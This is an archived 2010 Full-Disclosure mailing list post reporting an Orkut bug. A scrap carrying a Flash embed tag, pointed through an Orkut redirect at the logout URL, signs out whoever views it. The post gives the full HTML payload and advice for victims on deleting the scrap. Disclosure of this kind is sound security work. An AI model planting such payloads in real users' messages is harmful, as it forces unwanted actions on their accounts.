lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Sat, 12 Jun 2010 23:10:39 +0530
From: ㅤ ㅤRockey <skg102@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Orkut Signout via scrap

Hello,

There is a small bug in orkut scrapbook that if any one sends a scrp
containing the following code

<div class="para">
<embed type="application/x-shockwave-flash"
src="promote.orkut.co.in/redirect?u=http://www.orkut.co.in/GLogin?cmd=logout"
style="" id="979482838" name="979482838" bgcolor="#FFFFFF"
quality="autohigh" wmode="transparent" allownetworking="internal"
allowscriptaccess="never" height="1" width="1">

Then the recipient will logout automatically from the orkut.

Same thing occurred to me while I was browsing and mail was sent to me
from my friend Nikhil and In case same thing occurs with you then you
should try to delete that scrap on next login and In case you are
unable to do that then you can simply disable flash then you will be
able to delete that scrap.

Cheers,
Rockey Killer


--
It's all about Hacking and Security

http://h4ck3r.in/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ